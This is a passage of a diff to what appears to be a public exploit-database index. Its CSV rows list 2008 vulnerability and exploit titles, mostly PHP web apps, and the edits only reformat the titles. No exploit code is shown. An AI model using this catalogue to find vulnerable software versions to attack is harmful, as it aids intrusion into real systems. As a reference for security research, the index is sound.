Delete User Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 -5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 Arbitrary Edit/Add Users Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 +5387,platforms/php/webapps/5387.txt,"Prozilla Reviews Script 1.0 - Arbitrary Delete User Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 +5388,platforms/php/webapps/5388.txt,"Prozilla Topsites 1.0 - Arbitrary Edit/Add Users Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5389,platforms/php/webapps/5389.txt,"Prozilla Cheat Script 2.0 (id) Remote SQL Injection Vulnerability",2008-04-06,t0pP8uZz,php,webapps,0 5390,platforms/php/webapps/5390.txt,"Prozilla Freelancers (project) Remote SQL Injection Vulnerability",2008-04-07,t0pP8uZz,php,webapps,0 5391,platforms/php/webapps/5391.php,"Drake CMS <= 0.4.11 - Remote Blind SQL Injection Exploit",2008-04-07,EgiX,php,webapps,0 @@ -5048,7 +5048,7 @@ id,file,description,date,author,platform,type,port 5415,platforms/php/webapps/5415.txt,"Koobi 4.4/5.4 gallery Remote SQL Injection Vulnerability",2008-04-08,S@BUN,php,webapps,0 5416,platforms/windows/remote/5416.html,"IBiz E-Banking Integrator 2.0 - ActiveX Edition Insecure Method Exploit",2008-04-09,shinnai,windows,remote,0 5417,platforms/php/webapps/5417.htm,"phpBB Add-on Fishing Cat Portal Remote File Inclusion Exploit",2008-04-09,bd0rk,php,webapps,0 -5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 +5418,platforms/php/webapps/5418.pl,"KnowledgeQuest 2.5 - Arbitrary Add Admin Exploit",2008-04-09,t0pP8uZz,php,webapps,0 5419,platforms/php/webapps/5419.txt,"Free Photo Gallery Site Script (path) File Disclosure Vulnerability",2008-04-09,JIKO,php,webapps,0 5420,platforms/php/webapps/5420.txt,"Phaos R4000 Version (file) - Remote File Disclosure Vulnerability",2008-04-09,HaCkeR_EgY,php,webapps,0 5421,platforms/php/webapps/5421.txt,"KnowledgeQuest 2.6 - SQL Injection Vulnerabilities",2008-04-09,"Virangar Security",php,webapps,0 @@ -5096,7 +5096,7 @@ id,file,description,date,author,platform,type,port 5463,platforms/php/webapps/5463.txt,"Grape Statistics 0.2a (location) Remote File Inclusion Vulnerability",2008-04-18,MajnOoNxHaCkEr,php,webapps,0 5464,platforms/php/webapps/5464.txt,"5th Avenue Shopping Cart (category_ID) SQL Injection Vulnerability",2008-04-18,"Aria-Security Team",php,webapps,0 5465,platforms/php/webapps/5465.txt,"2532/Gigs <= 1.2.2 - Arbitrary Database Backup/Download Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 -5466,platforms/php/webapps/5466.pl,"OpenInvoice 0.9 Arbitrary Change User Password Exploit",2008-04-18,t0pP8uZz,php,webapps,0 +5466,platforms/php/webapps/5466.pl,"OpenInvoice 0.9 - Arbitrary Change User Password Exploit",2008-04-18,t0pP8uZz,php,webapps,0 5467,platforms/php/webapps/5467.txt,"PhShoutBox <= 1.5 (final) Insecure Cookie Handling Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 5468,platforms/php/webapps/5468.txt,"Simple Customer 1.2 (contact.php id) SQL Injection Vulnerability",2008-04-18,t0pP8uZz,php,webapps,0 5469,platforms/php/webapps/5469.txt,"AllMyGuests <= 0.4.1 (AMG_id) Remote SQL Injection Vulnerability",2008-04-19,Player,php,webapps,0 @@ -5119,14 +5119,14 @@ id,file,description,date,author,platform,type,port 5486,platforms/php/webapps/5486.txt,"Wordpress Plugin Spreadsheet <= 0.6 - SQL Injection Vulnerability",2008-04-22,1ten0.0net1,php,webapps,0 5487,platforms/php/webapps/5487.txt,"E RESERV 2.1 (index.php ID_loc) SQL Injection Vulnerability",2008-04-23,JIKO,php,webapps,0 5488,platforms/php/webapps/5488.txt,"Joomla Component Filiale 1.0.4 (idFiliale) SQL Injection Vulnerability",2008-04-23,str0xo,php,webapps,0 -5489,platforms/windows/remote/5489.html,"Zune Software ActiveX Arbitrary File Overwrite Exploit",2008-04-23,"ilion security",windows,remote,0 +5489,platforms/windows/remote/5489.html,"Zune Software - ActiveX Arbitrary File Overwrite Exploit",2008-04-23,"ilion security",windows,remote,0 5490,platforms/php/webapps/5490.pl,"YouTube Clone Script (spages.php) Remote Code Execution Exploit",2008-04-23,Inphex,php,webapps,0 5491,platforms/php/webapps/5491.txt,"Joomla Community Builder <= 1.0.1 - Blind SQL Injection Vulnerability",2008-04-23,$hur!k'n,php,webapps,0 5492,platforms/windows/local/5492.cpp,"DivX Player 6.7 SRT File Subtitle Parsing Buffer Overflow Exploit",2008-04-24,lhoang8500,windows,local,0 5493,platforms/php/webapps/5493.txt,"Joomla Component JPad 1.0 - SQL Injection Vulnerability (postauth)",2008-04-24,His0k4,php,webapps,0 5494,platforms/php/webapps/5494.txt,"minibb 2.2 (css/sql/fpd) Multiple Vulnerabilities",2008-04-25,girex,php,webapps,0 5495,platforms/php/webapps/5495.txt,"PostNuke Module PostSchedule (eid) SQL Injection Vulnerability",2008-04-25,Kacper,php,webapps,0 -5496,platforms/windows/remote/5496.html,"WatchFire Appscan 7.0 ActiveX Multiple Insecure Methods Exploit",2008-04-25,callAX,windows,remote,0 +5496,platforms/windows/remote/5496.html,"WatchFire Appscan 7.0 - ActiveX Multiple Insecure Methods Exploit",2008-04-25,callAX,windows,remote,0 5497,platforms/php/webapps/5497.txt,"Joomla Component Joomla-Visites 1.1 RC2 RFI Vulnerability",2008-04-25,NoGe,php,webapps,0 5498,platforms/windows/local/5498.py,"Kantaris 0.3.4 SSA Subtitle Local Buffer Overflow Exploit",2008-04-25,j0rgan,windows,local,0 5499,platforms/php/webapps/5499.txt,"siteman 2.x (exec/lfi/XSS) Multiple Vulnerabilities",2008-04-26,IRCRASH,php,webapps,0 @@ -5152,7 +5152,7 @@ id,file,description,date,author,platform,type,port 5519,platforms/windows/remote/5519.c,"VLC 0.8.6d - httpd_FileCallBack Remote Format String Exploit",2008-04-28,EpiBite,windows,remote,0 5520,platforms/php/webapps/5520.txt,"Joovili 3.1 (browse.videos.php category) SQL Injection Vulnerability",2008-04-28,HaCkeR_EgY,php,webapps,0 5521,platforms/php/webapps/5521.txt,"SugarCRM Community Edition 4.5.1/5.0.0 File Disclosure Vulnerability",2008-04-29,"Roberto Suggi Liverani",php,webapps,0 -5522,platforms/php/webapps/5522.txt,"LokiCMS <= 0.3.3 Arbitrary File Delete Vulnerability",2008-04-29,cOndemned,php,webapps,0 +5522,platforms/php/webapps/5522.txt,"LokiCMS <= 0.3.3 - Arbitrary File Delete Vulnerability",2008-04-29,cOndemned,php,webapps,0 5523,platforms/php/webapps/5523.txt,"Project Based Calendaring System (PBCS) 0.7.1 - Multiple Vulnerabilities",2008-04-30,GoLd_M,php,webapps,0 5524,platforms/php/webapps/5524.txt,"OxYProject 0.85 (edithistory.php) Remote Code Execution Vulnerability",2008-04-30,GoLd_M,php,webapps,0 5525,platforms/php/webapps/5525.txt,"Harris WapChat 1 - Multiple Remote File Inclusion Vulnerabilities",2008-04-30,k1n9k0ng,php,webapps,0 @@ -5235,7 +5235,7 @@ id,file,description,date,author,platform,type,port 5609,platforms/php/webapps/5609.txt,"EMO Realty Manager (news.php ida) SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 5610,platforms/php/webapps/5610.txt,"The Real Estate Script (dpage.php docID) SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 5611,platforms/php/webapps/5611.txt,"Linkspile (link.php cat_id) Remote SQL Injection Vulnerability",2008-05-13,HaCkeR_EgY,php,webapps,0 -5612,platforms/windows/remote/5612.html,"idautomation bar code activex Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 +5612,platforms/windows/remote/5612.html,"idautomation bar code ActiveX Multiple Vulnerabilities",2008-05-14,shinnai,windows,remote,0 5613,platforms/php/webapps/5613.txt,"Freelance Auction Script 1.0 (browseproject.php) SQL Injection Vuln",2008-05-14,t0pP8uZz,php,webapps,0 5614,platforms/php/webapps/5614.txt,"Feedback and Rating Script 1.0 (detail.php) SQL Injection Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0 5615,platforms/php/webapps/5615.txt,"AS-GasTracker 1.0.0 Insecure Cookie Handling Vulnerability",2008-05-14,t0pP8uZz,php,webapps,0 @@ -5250,7 +5250,7 @@ id,file,description,date,author,platform,type,port 5624,platforms/php/webapps/5624.txt,"newsmanager 2.0 (rfi/rfd/sql/pb) Multiple Vulnerabilities",2008-05-15,GoLd_M,php,webapps,0 5625,platforms/windows/local/5625.c,"Symantec Altiris Client Service 6.8.378 - Local Privilege Escalation Exploit",2008-05-15,"Alex Hernandez",windows,local,0 5626,platforms/php/webapps/5626.txt,"68 Classifieds 4.0 (category.php cat) SQL Injection Vulnerability",2008-05-15,HaCkeR_EgY,php,webapps,0 -5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System <= 2.0 Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 +5627,platforms/php/webapps/5627.pl,"Pet Grooming Management System <= 2.0 - Arbitrary Add-Admin Exploit",2008-05-15,t0pP8uZz,php,webapps,0 5628,platforms/php/webapps/5628.txt,"RantX 1.0 Insecure Admin Authentication Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 5629,platforms/php/webapps/5629.txt,"Web Slider <= 0.6 Insecure Cookie/Authentication Handling Vuln",2008-05-15,t0pP8uZz,php,webapps,0 5630,platforms/php/webapps/5630.txt,"Multi-Page Comment System 1.1.0 Insecure Cookie Handling Vulnerability",2008-05-15,t0pP8uZz,php,webapps,0 @@ -5273,7 +5273,7 @@ id,file,description,date,author,platform,type,port 5647,platforms/php/webapps/5647.txt,"GNU/Gallery <= 1.1.1.0 (admin.php) Local File Inclusion Vulnerability",2008-05-18,t0pP8uZz,php,webapps,0 5648,platforms/php/webapps/5648.pl,"MeltingIce File System <= 1.0 - Remote Arbitrary Add-User Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5649,platforms/php/webapps/5649.pl,"PHP AGTC-Membership System <= 1.1a Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 -5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 +5650,platforms/php/webapps/5650.pl,"MyPicGallery 1.0 - Arbitrary Add-Admin Exploit",2008-05-18,t0pP8uZz,php,webapps,0 5651,platforms/php/webapps/5651.txt,"microssys CMS <= 1.5 - Remote File Inclusion Vulnerability",2008-05-19,Raz0r,php,webapps,0 5652,platforms/php/webapps/5652.pl,"AlkalinePHP <= 0.80.00 beta (thread.php id) SQL Injection Exploit",2008-05-19,Stack,php,webapps,0 5653,platforms/php/webapps/5653.php,"MercuryBoard <= 1.1.5 (login.php) Remote Blind SQL Injection Exploit",2008-05-19,EgiX,php,webapps,0 @@ -5297,7 +5297,7 @@ id,file,description,date,author,platform,type,port 5671,platforms/php/webapps/5671.txt,"phpRaider 1.0.7 (phpbb3.functions.php) RFI Vulnerability",2008-05-24,Kacak,php,webapps,0 5672,platforms/php/webapps/5672.txt,"plusphp url shortening software 1.6 - Remote File Inclusion Vulnerability",2008-05-25,DR.TOXIC,php,webapps,0 5673,platforms/php/webapps/5673.txt,"Xomol CMS <= 1.2 Login Bypass / LFI Vulnerabilities",2008-05-25,DNX,php,webapps,0 -5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 Arbitrary Add Admin User Vulnerability",2008-05-26,Stack,php,webapps,0 +5674,platforms/php/webapps/5674.txt,"RoomPHPlanning 1.5 - Arbitrary Add Admin User Vulnerability",2008-05-26,Stack,php,webapps,0 5675,platforms/php/webapps/5675.txt,"RoomPHPlanning 1.5 - Multiple Remote SQL Injection Vulnerabilities",2008-05-26,"Virangar Security",php,webapps,0 5676,platforms/php/webapps/5676.txt,"CMS MAXSITE <= 1.10 (category) Remote SQL Injection Vulnerability",2008-05-26,Tesz,php,webapps,0 5677,platforms/php/webapps/5677.txt,"RevokeBB 1.0 RC11 (search) Remote SQL Injection Vulnerability",2008-05-27,The:Paradox,php,webapps,0 @@ -5361,7 +5361,7 @@ id,file,description,date,author,platform,type,port 5738,platforms/windows/remote/5738.rb,"HP StorageWorks NSI Double Take Remote Overflow Exploit (meta)",2008-06-04,ri0t,windows,remote,1100 5739,platforms/php/webapps/5739.txt,"PHP-Address Book <= 3.1.5 (SQL/XSS) Multiple Vulnerabilities",2008-06-04,"CWH Underground",php,webapps,0 5740,platforms/php/webapps/5740.pl,"Joomla Component EasyBook 1.1 (gbid) SQL Injection Exploit",2008-06-04,ZAMUT,php,webapps,0 -5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0 +5741,platforms/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download Exploit",2008-06-04,cocoruder,windows,remote,0 5742,platforms/php/webapps/5742.txt,"427bb 2.3.1 (sql/XSS) Multiple Vulnerabilities",2008-06-05,"CWH Underground",php,webapps,0 5743,platforms/php/webapps/5743.txt,"Joomla Component simpleshop <= 3.4 - SQL Injection",2008-06-05,His0k4,php,webapps,0 5744,platforms/php/webapps/5744.txt,"Power Phlogger 2.2.5 (css_str) SQL Injection Vulnerability",2008-06-05,MustLive,php,webapps,0 @@ -5389,7 +5389,7 @@ id,file,description,date,author,platform,type,port 5766,platforms/php/webapps/5766.txt,"realm CMS <= 2.3 - Multiple Vulnerabilities",2008-06-09,BugReport.IR,php,webapps,0 5767,platforms/php/webapps/5767.php,"Flux CMS <= 1.5.0 (loadsave.php) Remote Arbitrary File Overwrite Exploit",2008-06-09,EgiX,php,webapps,0 5768,platforms/php/webapps/5768.txt,"pNews 2.08 (shownews) Remote SQL Injection Vulnerability",2008-06-09,Cr@zy_King,php,webapps,0 -5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 +5769,platforms/php/webapps/5769.pl,"Telephone Directory 2008 - Arbitrary Delete Contact Exploit",2008-06-09,Stack,php,webapps,0 5770,platforms/php/webapps/5770.php,"Achievo <= 1.3.2 (fckeditor) Arbitrary File Upload Exploit",2008-06-09,EgiX,php,webapps,0 5771,platforms/php/webapps/5771.txt,"ErfurtWiki <= R1.02b (css) Local File Inclusion Vulnerabilities",2008-06-10,Unohope,php,webapps,0 5772,platforms/php/webapps/5772.txt,"DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability",2008-06-10,Unohope,php,webapps,0 @@ -5400,13 +5400,13 @@ id,file,description,date,author,platform,type,port 5777,platforms/windows/remote/5777.html,"Black Ice Software Annotation Plugin (BiAnno.ocx) Remote BoF Exploit",2008-06-10,shinnai,windows,remote,0 5778,platforms/windows/remote/5778.html,"Black Ice Software Annotation Plugin (BiAnno.ocx) BoF Exploit (2)",2008-06-10,shinnai,windows,remote,0 5779,platforms/php/webapps/5779.txt,"syndeo CMS 2.6.0 - (LFI/XSS) Multiple Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 -5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 Arbitrary Change Administrator Account Vulnerability",2008-06-10,Zigma,asp,webapps,0 +5780,platforms/asp/webapps/5780.txt,"ASP Download 1.03 - Arbitrary Change Administrator Account Vulnerability",2008-06-10,Zigma,asp,webapps,0 5781,platforms/asp/webapps/5781.txt,"Todd Woolums ASP News Management 2.2 - SQL Injection Vulnerabiltiy",2008-06-10,Bl@ckbe@rD,asp,webapps,0 5782,platforms/php/webapps/5782.txt,"TNT Forum 0.9.4 - Local File Inclusion Vulnerabilities",2008-06-10,"CWH Underground",php,webapps,0 5783,platforms/php/webapps/5783.txt,"Yuhhu 2008 SuperStar (board) Remote SQL Injection Exploit",2008-06-10,RMx,php,webapps,0 5784,platforms/php/webapps/5784.txt,"FOG Forum 0.8.1 - Multiple Local File Inclusion Vulnerabilities",2008-06-11,"CWH Underground",php,webapps,0 5785,platforms/php/webapps/5785.txt,"eFiction 3.0 (toplists.php list) Remote SQL Injection Vulnerability",2008-06-11,Mr.SQL,php,webapps,0 -5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 Arbitrary Add-Admin Exploit",2008-06-11,"CWH Underground",php,webapps,0 +5786,platforms/php/webapps/5786.txt,"IPTBB 0.5.6 - Arbitrary Add-Admin Exploit",2008-06-11,"CWH Underground",php,webapps,0 5787,platforms/php/webapps/5787.txt,"MycroCMS 0.5 - Remote Blind SQL Injection Vulnerability",2008-06-11,"CWH Underground",php,webapps,0 5788,platforms/php/webapps/5788.txt,"Pooya Site Builder (PSB) 6.0 - Multiple SQL Injection Vulnerabilities",2008-06-11,BugReport.IR,php,webapps,0 5789,platforms/php/webapps/5789.pl,"JAMM CMS (id) Remote Blind SQL Injection Exploit",2008-06-11,N/A,php,webapps,0 @@ -5418,9 +5418,9 @@ id,file,description,date,author,platform,type,port 5795,platforms/windows/remote/5795.html,"XChat <= 2.8.7b (URI Handler) Remote Code Execution Exploit (ie6/ie7)",2008-06-13,securfrog,windows,remote,0 5796,platforms/php/webapps/5796.php,"GLLCTS2 <= 4.2.4 - (login.php detail) SQL Injection Exploit",2008-06-12,TheDefaced,php,webapps,0 5797,platforms/php/webapps/5797.txt,"butterfly organizer 2.0.0 (sql/XSS) Multiple Vulnerabilities",2008-06-13,"CWH Underground",php,webapps,0 -5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 Arbitrary Add Admin Exploit",2008-06-13,"CWH Underground",php,webapps,0 +5798,platforms/php/webapps/5798.pl,"WebChamado 1.1 - Arbitrary Add Admin Exploit",2008-06-13,"CWH Underground",php,webapps,0 5799,platforms/php/webapps/5799.pl,"Mambo Component galleries 1.0 (aid) Remote SQL Injection Exploit",2008-06-13,Houssamix,php,webapps,0 -5800,platforms/php/webapps/5800.pl,"Butterfly Organizer 2.0.0 Arbitrary Delete (Category/Account) Exploit",2008-06-13,Stack,php,webapps,0 +5800,platforms/php/webapps/5800.pl,"Butterfly Organizer 2.0.0 - Arbitrary Delete (Category/Account) Exploit",2008-06-13,Stack,php,webapps,0 5801,platforms/php/webapps/5801.txt,"Easy-Clanpage 3.0b1 (section) Local File Inclusion Vulnerability",2008-06-13,Loader007,php,webapps,0 5802,platforms/php/webapps/5802.txt,"WebChamado 1.1 (tsk_id) Remote SQL Injection Vulnerability",2008-06-13,"Virangar Security",php,webapps,0 5803,platforms/php/webapps/5803.txt,"Pre News Manager <= 1.0 (index.php id) SQL Injection Vulnerability",2008-06-13,K-159,php,webapps,0 @@ -5587,7 +5587,7 @@ id,file,description,date,author,platform,type,port 5968,platforms/windows/dos/5968.py,"Surgemail 39e-1 Post Auth IMAP Remote Buffer Overflow DoS",2008-06-30,"Travis Warren",windows,dos,0 5969,platforms/php/webapps/5969.txt,"AcmlmBoard 1.A2 (pow) Remote SQL Injection Vulnerability",2008-06-30,N/A,php,webapps,0 5970,platforms/php/webapps/5970.txt,"eSHOP100 (SUB) Remote SQL Injection Vulnerability",2008-06-30,JuDge,php,webapps,0 -5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 Arbitrary Add Admin Exploit",2008-06-30,"CWH Underground",php,webapps,0 +5971,platforms/php/webapps/5971.pl,"BareNuked CMS 1.1.0 - Arbitrary Add Admin Exploit",2008-06-30,"CWH Underground",php,webapps,0 5972,platforms/php/webapps/5972.txt,"RCM Revision Web Development (products.php) SQL Injection Vulnerability",2008-06-30,Niiub,php,webapps,0 5973,platforms/php/webapps/5973.php,"Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure Exploit",2008-06-30,Nine:Situations:Group,php,webapps,0 5974,platforms/php/webapps/5974.txt,"Catviz 0.4.0 beta1 - Multiple Remote SQL Injection Vulnerabilities",2008-06-30,N/A,php,webapps,0 @@ -5637,7 +5637,7 @@ id,file,description,date,author,platform,type,port 6019,platforms/php/webapps/6019.pl,"SmartPPC Pay Per Click Script (idDirectory) Blind SQL Injection Exploit",2008-07-07,ka0x,php,webapps,0 6021,platforms/php/webapps/6021.txt,"Mole Group Hotel Script 1.0 - Remote SQL Injection Vulnerability",2008-07-08,t0pP8uZz,php,webapps,0 6022,platforms/php/webapps/6022.txt,"Mole Group Real Estate Script <= 1.1 - Remote SQL Injection Vulnerability",2008-07-08,t0pP8uZz,php,webapps,0 -6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 Arbitrary Add Admin Exploit",2008-07-08,"CWH Underground",php,webapps,0 +6023,platforms/php/webapps/6023.pl,"BrewBlogger 2.1.0.1 - Arbitrary Add Admin Exploit",2008-07-08,"CWH Underground",php,webapps,0 6024,platforms/php/webapps/6024.txt,"Boonex Dolphin 6.1.2 - Multiple Remote File Inclusion Vulnerabilities",2008-07-08,RoMaNcYxHaCkEr,php,webapps,0 6025,platforms/php/webapps/6025.txt,"Joomla Component com_content 1.0.0 (ItemID) SQL Injection Vuln",2008-07-08,unknown_styler,php,webapps,0 6026,platforms/linux/remote/6026.pl,"trixbox (langChoice) - Local File Inclusion Exploit (connect-back) (2)",2008-07-09,"Jean-Michel BESNARD",linux,remote,80 @@ -5656,7 +5656,7 @@ id,file,description,date,author,platform,type,port 6040,platforms/php/webapps/6040.txt,"File Store PRO 3.2 - Multiple Blind SQL Injection Vulnerabilities",2008-07-11,"Nu Am Bani",php,webapps,0 6041,platforms/php/webapps/6041.txt,"facebook newsroom CMS 0.5.0 beta 1 - Remote File Inclusion Vulnerability",2008-07-11,Ciph3r,php,webapps,0 6042,platforms/php/webapps/6042.txt,"Wysi Wiki Wyg 1.0 - (LFI/XSS/PHPInfo) Remote Vulnerabilities",2008-10-20,StAkeR,php,webapps,0 -6043,platforms/osx/dos/6043.rb,"Core Image Fun House <= 2.0 Arbitrary Code Execution PoC (OSX)",2008-07-11,"Adriel T. Desautels",osx,dos,0 +6043,platforms/osx/dos/6043.rb,"Core Image Fun House <= 2.0 - Arbitrary Code Execution PoC (OSX)",2008-07-11,"Adriel T. Desautels",osx,dos,0 6044,platforms/php/webapps/6044.txt,"Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability",2008-07-11,"Hussin X",php,webapps,0 6045,platforms/linux/remote/6045.py,"Trixbox 2.6.1 - (langChoice) Remote Root Exploit (py)",2008-07-12,muts,linux,remote,80 6046,platforms/multiple/dos/6046.txt,"reSIProcate 1.3.2 - Remote Denial of Service PoC",2008-07-12,"Mu Security",multiple,dos,0 @@ -5684,7 +5684,7 @@ id,file,description,date,author,platform,type,port 6069,platforms/php/webapps/6069.txt,"itechbids 7.0 gold (xss/SQL) Multiple Vulnerabilities",2008-07-13,"Encrypt3d.M!nd ",php,webapps,0 6070,platforms/php/webapps/6070.php,"Scripteen Free Image Hosting Script 1.2 (cookie) Pass Grabber Exploit",2008-07-13,RMx,php,webapps,0 6071,platforms/php/webapps/6071.txt,"CodeDB (list.php lang) Local File Inclusion Vulnerability",2008-07-14,cOndemned,php,webapps,0 -6072,platforms/windows/dos/6072.html,"Yahoo Messenger 8.1 ActiveX Remote Denial of Service Exploit",2008-07-14,"Jeremy Brown",windows,dos,0 +6072,platforms/windows/dos/6072.html,"Yahoo Messenger 8.1 - ActiveX Remote Denial of Service Exploit",2008-07-14,"Jeremy Brown",windows,dos,0 6073,platforms/php/webapps/6073.txt,"bilboblog 2.1 - Multiple Vulnerabilities",2008-07-14,BlackH,php,webapps,0 6074,platforms/php/webapps/6074.txt,"Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)",2008-07-14,BugReport.IR,php,webapps,0 6075,platforms/php/webapps/6075.txt,"Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability",2008-07-15,StAkeR,php,webapps,0 @@ -5695,7 +5695,7 @@ id,file,description,date,author,platform,type,port 6080,platforms/php/webapps/6080.txt,"php Help Agent <= 1.1 (content) Local File Inclusion Vulnerability",2008-07-15,BeyazKurt,php,webapps,0 6081,platforms/php/webapps/6081.txt,"Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability",2008-07-15,"Virangar Security",php,webapps,0 6082,platforms/php/webapps/6082.txt,"PhotoPost vBGallery 2.4.2 - Arbitrary File Upload Vulnerability",2008-07-15,"Cold Zero",php,webapps,0 -6083,platforms/windows/dos/6083.html,"Document Imaging SDK 10.95 ActiveX Buffer Overflow PoC",2008-07-15,r0ut3r,windows,dos,0 +6083,platforms/windows/dos/6083.html,"Document Imaging SDK 10.95 - ActiveX Buffer Overflow PoC",2008-07-15,r0ut3r,windows,dos,0 6084,platforms/php/webapps/6084.txt,"HockeySTATS Online 2.0 - Multiple Remote SQL Injection Vulnerabilities",2008-07-15,Mr.SQL,php,webapps,0 6085,platforms/php/webapps/6085.pl,"PHPizabi 0.848b C1 HFP1 - Remote Code Execution Exploit",2008-07-16,Inphex,php,webapps,0 6086,platforms/php/webapps/6086.txt,"Joomla Component DT Register Remote SQL Injection Vulnerability",2008-07-16,His0k4,php,webapps,0 @@ -5777,9 +5777,9 @@ id,file,description,date,author,platform,type,port 6163,platforms/php/webapps/6163.txt,"PHP Hosting Directory 2.0 Insecure Cookie Handling Vulnerability",2008-07-30,Stack,php,webapps,0 6164,platforms/php/webapps/6164.txt,"nzFotolog 0.4.1 (action_file) Local File Inclusion Vulnerability",2008-07-30,IRCRASH,php,webapps,0 6165,platforms/php/webapps/6165.txt,"ZeeReviews (comments.php ItemID) Remote SQL Injection Vulnerability",2008-07-30,Mr.SQL,php,webapps,0 -6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 +6166,platforms/php/webapps/6166.php,"HIOX Random Ad 1.3 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 6167,platforms/php/webapps/6167.txt,"Article Friendly Pro/Standard (Cat) Remote SQL Injection Vulnerability",2008-07-30,Mr.SQL,php,webapps,0 -6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 +6168,platforms/php/webapps/6168.php,"HIOX Browser Statistics 2.0 - Arbitrary Add Admin User Exploit",2008-07-30,Stack,php,webapps,0 6169,platforms/php/webapps/6169.txt,"PozScripts Classified Ads Script (cid) SQL Injection Vulnerability",2008-07-30,"Hussin X",php,webapps,0 6170,platforms/php/webapps/6170.txt,"TubeGuru Video Sharing Script (UID) SQL Injection Vulnerability",2008-07-30,"Hussin X",php,webapps,0 6171,platforms/php/webapps/6171.pl,"eNdonesia 8.4 (Calendar Module) Remote SQL Injection Exploit",2008-07-30,Jack,php,webapps,0 @@ -5870,7 +5870,7 @@ id,file,description,date,author,platform,type,port 6273,platforms/php/webapps/6273.txt,"SunShop <= 4.1.4 (id) Remote SQL Injection Vulnerability",2008-08-19,"GulfTech Security",php,webapps,0 6276,platforms/php/webapps/6276.txt,"Banner Management Script (tr.php id) Remote SQL Injection Vulnerability",2008-08-19,S.W.A.T.,php,webapps,0 6277,platforms/php/webapps/6277.txt,"Active PHP Bookmarks 1.1.02 - Remote SQL Injection Vulnerability",2008-08-19,"Hussin X",php,webapps,0 -6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object <= 3.2.30 ActiveX Buffer Overflow Exploit",2008-08-20,"Core Security",windows,remote,0 +6278,platforms/windows/remote/6278.txt,"Anzio Web Print Object <= 3.2.30 - ActiveX Buffer Overflow Exploit",2008-08-20,"Core Security",windows,remote,0 6279,platforms/php/webapps/6279.pl,"Pars4U Videosharing 1.0 - XSS / Remote Blind SQL Injection Exploit",2008-08-20,Mr.SQL,php,webapps,0 6280,platforms/php/webapps/6280.txt,"phpBazar 2.0.2 (adid) Remote SQL Injection Vulnerability",2008-08-20,e.wiZz!,php,webapps,0 6281,platforms/php/webapps/6281.pl,"webEdition CMS (we_objectID) Blind SQL Injection Exploit",2008-08-20,Lidloses_Auge,php,webapps,0 @@ -5890,7 +5890,7 @@ id,file,description,date,author,platform,type,port 6300,platforms/php/webapps/6300.txt,"Pluck CMS 4.5.2 - Multiple Local File Inclusion Vulnerabilities",2008-08-25,DSecRG,php,webapps,0 6301,platforms/php/webapps/6301.txt,"ezContents CMS 2.0.3 - Multiple Local File Inclusion Vulnerabilities",2008-08-25,DSecRG,php,webapps,0 6302,platforms/windows/remote/6302.pl,"Dana IRC 1.4a Remote Buffer Overflow Exploit",2008-08-25,"Guido Landi",windows,remote,0 -6303,platforms/php/webapps/6303.txt,"WebBoard <= 2.0 Arbitrary SQL Question/Anwser Delete Vulnerability",2008-08-25,t0pP8uZz,php,webapps,0 +6303,platforms/php/webapps/6303.txt,"WebBoard <= 2.0 - Arbitrary SQL Question/Anwser Delete Vulnerability",2008-08-25,t0pP8uZz,php,webapps,0 6305,platforms/hardware/remote/6305.htm,"Belkin wireless G router + ADSL2 modem Auth Bypass Exploit",2008-08-25,noensr,hardware,remote,0 6306,platforms/php/webapps/6306.pl,"GeekLog <= 1.5.0 - Remote Arbitrary File Upload Exploit",2008-08-25,t0pP8uZz,php,webapps,0 6307,platforms/php/webapps/6307.txt,"Crafty Syntax Live Help <= 2.14.6 (department) SQL Injection Vuln",2008-08-25,"GulfTech Security",php,webapps,0 @@ -5999,7 +5999,7 @@ id,file,description,date,author,platform,type,port 6421,platforms/php/webapps/6421.php,"Wordpress 2.6.1 (SQL Column Truncation) Admin Takeover Exploit",2008-09-10,iso^kpsbr,php,webapps,0 6422,platforms/php/webapps/6422.txt,"phpvid 1.1 (xss/SQL) Multiple 